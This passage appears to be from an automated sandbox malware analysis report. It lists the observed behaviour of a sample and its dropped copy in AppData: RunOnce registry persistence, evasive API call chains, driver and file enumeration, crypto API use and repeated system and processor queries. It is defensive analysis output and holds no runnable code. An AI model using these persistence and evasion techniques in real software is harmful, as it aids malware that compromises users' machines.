                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zutkqlfvbho
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zutkqlfvbho
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zmiqihkfrbh
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zmiqihkfrbh
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zmiqihkfrbh
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zmiqihkfrbh
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rpklcocahbn
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rpklcocahbn
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rpklcocahbn
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rpklcocahbn
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-1806
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,0_2_0F142F50
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,3_2_0F582F50
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,11_2_0F582F50
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F146BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,0_2_0F146BA0
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F146DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,0_2_0F146DF0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F586DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,3_2_0F586DF0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F586BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,3_2_0F586BA0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F586DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,11_2_0F586DF0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F586BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,11_2_0F586BA0
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeAPI call chain: ExitProcess graph end nodegraph_0-1761
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeAPI call chain: ExitProcess graph end nodegraph_0-1783
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeAPI call chain: ExitProcess graph end nodegraph_0-1980
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeAPI call chain: ExitProcess graph end nodegraph_0-1773
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeAPI call chain: ExitProcess graph end nodegraph_0-1911
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeAPI call chain: ExitProcess graph end nodegraph_3-1754
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeAPI call chain: ExitProcess graph end nodegraph_3-1778
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeAPI call chain: ExitProcess graph end nodegraph_3-1769
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeAPI call chain: ExitProcess graph end nodegraph_3-1970
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeAPI call chain: ExitProcess graph end nodegraph_3-1904
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeAPI call chain: ExitProcess graph end nodegraph_11-1734
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeAPI call chain: ExitProcess graph end nodegraph_11-1925
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeAPI call chain: ExitProcess graph end nodegraph_11-1725
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeAPI call chain: ExitProcess graph end nodegraph_11-1860
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeAPI call chain: ExitProcess graph end nodegraph_11-1710
                Source: mqsmvj.exe, 0000000B.00000002.327597151.000000000093A000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000002.343769957.0000000000838000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000E.00000002.373523162.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 00000019.00000002.501583638.0000000000D18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F148400 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,0_2_0F148400
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F143200 lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,GetProcessHeap,HeapAlloc,lstrcpyA,0_2_0F143200
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F145FF0 mov eax, dword ptr fs:[00000030h]0_2_0F145FF0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F585FF0 mov eax, dword ptr fs:[00000030h]3_2_0F585FF0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F585FF0 mov eax, dword ptr fs:[00000030h]11_2_0F585FF0
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F143C70 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid,0_2_0F143C70
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F149200 cpuid 0_2_0F149200
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
